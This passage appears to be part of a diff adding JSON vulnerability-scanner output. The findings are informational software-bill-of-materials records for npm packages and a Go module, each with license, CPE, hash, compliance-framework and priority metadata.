"Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "282a3bcad6a151e3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: glob-parent 5.1.2", + "title": "glob-parent 5.1.2", + "description": "Package discovered: glob-parent 5.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e9e84f484cfaf367", + "name": "glob-parent", + "version": "5.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:gulpjs:glob-parent:5.1.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/glob-parent@5.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", + "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", + "dependencies": { + "is-glob": "^4.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4709c0ff6455a8d2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: glob-parent 6.0.2", + "title": "glob-parent 6.0.2", + "description": "Package discovered: glob-parent 6.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1644b4942c7696f6", + "name": "glob-parent", + "version": "6.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:gulpjs:glob-parent:6.0.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/glob-parent@6.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dependencies": { + "is-glob": "^4.0.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0dbbd23e15d1e62b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "startLine": 0 + }, + "message": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", + "title": "golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", + "description": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7890a665ce9e5849", + "name": "golang.org/x/sys", + "version": "v0.0.0-20220715151400-c0bba94af5f8", + "type": "go-module", + "foundBy": "go-module-binary-cataloger", + "locations": [ + { + "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "accessPath": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "go", + "cpes": [ + { + "cpe": "cpe:2.3:a:golang:x\\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8", + "metadataType": "go-module-buildinfo-entry", + "metadata": { + "goCompiledVersion": "go1.20.12", + "architecture": "arm64", + "h1Digest": "h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=", + "mainModule": "github.com/evanw/esbuild", + "goCryptoSettings": [ + "standard-crypto" + ] + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5c6e328f37ad400d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/esbuild/bin/esbuild", + "startLine": 0 + }, + "message": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", + "title": "golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", + "description": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "839067488ff020a0", + "name": "golang.org/x/sys", + "version": "v0.0.0-20220715151400-c0bba94af5f8", + "type": "go-module", + "foundBy": "go-module-binary-cataloger", + "locations": [ + { + "path": "/node_modules/esbuild/bin/esbuild", + "accessPath": "/node_modules/esbuild/bin/esbuild", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "go", + "cpes": [ + { + "cpe": "cpe:2.3:a:golang:x\\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8", + "metadataType": "go-module-buildinfo-entry", + "metadata": { + "goCompiledVersion": "go1.20.12", + "architecture": "arm64", + "h1Digest": "h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=", + "mainModule": "github.com/evanw/esbuild", + "goCryptoSettings": [ + "standard-crypto" + ] + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "59d2bd18fdd1d561", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: google-auth-library 9.15.1", + "title": "google-auth-library 9.15.1", + "description": "Package discovered: google-auth-library 9.15.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4fb04863a4dacd73", + "name": "google-auth-library", + "version": "9.15.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:google-auth-library:google-auth-library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google-auth-library:google_auth_library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_auth_library:google-auth-library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_auth_library:google_auth_library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google-auth:google-auth-library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google-auth:google_auth_library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_auth:google-auth-library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_auth:google_auth_library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google:google-auth-library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google:google_auth_library:9.15.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/google-auth-library@9.15.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.15.1.tgz", + "integrity": "sha512-Jb6Z0+nvECVz+2lzSMt9u98UsoakXxA2HGHMCxh+so3n90XgYWkq5dur19JAJV7ONiJY22yBTyJB1TSkvPq9Ng==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.1.1", + "gcp-metadata": "^6.1.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f744ca691ff58390", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: google-gax 4.6.1", + "title": "google-gax 4.6.1", + "description": "Package discovered: google-gax 4.6.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3344aade71052029", + "name": "google-gax", + "version": "4.6.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:google-gax:google-gax:4.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google-gax:google_gax:4.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_gax:google-gax:4.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_gax:google_gax:4.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google:google-gax:4.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google:google_gax:4.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/google-gax@4.6.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-4.6.1.tgz", + "integrity": "sha512-V6eky/xz2mcKfAd1Ioxyd6nmA61gao3n01C+YeuIwu3vzM9EDR6wcVzMSIbLMDXWeoi9SHYctXuKYC5uJUT3eQ==", + "dependencies": { + "@grpc/grpc-js": "^1.10.9", + "@grpc/proto-loader": "^0.7.13", + "@types/long": "^4.0.0", + "abort-controller": "^3.0.0", + "duplexify": "^4.0.0", + "google-auth-library": "^9.3.0", + "node-fetch": "^2.7.0", + "object-hash": "^3.0.0", + "proto3-json-serializer": "^2.0.2", + "protobufjs": "^7.3.2", + "retry-request": "^7.0.0", + "uuid": "^9.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "38ca80e4adb1c1ba", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: google-logging-utils 0.0.2", + "title": "google-logging-utils 0.0.2", + "description": "Package discovered: google-logging-utils 0.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c45a9f7f7c5a1d26", + "name": "google-logging-utils", + "version": "0.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:google-logging-utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google-logging-utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_logging_utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_logging_utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google-logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google-logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google_logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google:google-logging-utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:google:google_logging_utils:0.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/google-logging-utils@0.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-0.0.2.tgz", + "integrity": "sha512-NEgUnEcBiP5HrPzufUkBzJOD/Sxsco3rLNo1F1TNf7ieU8ryUzBhqba8r756CjLX7rn3fHl6iLEwPYuqpoKgQQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bb6c934fdca5487f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: gopd 1.2.0", + "title": "gopd 1.2.0", + "description": "Package discovered: gopd 1.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2f2433574e565258", + "name": "gopd", + "version": "1.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:gopd:gopd:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/gopd@1.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "30861bd8904bacc9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: graceful-fs 4.2.11", + "title": "graceful-fs 4.2.11", + "description": "Package discovered: graceful-fs 4.2.11", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "45319b4c36cfb339", + "name": "graceful-fs", + "version": "4.2.11", + "type": "npm", + "foundBy": 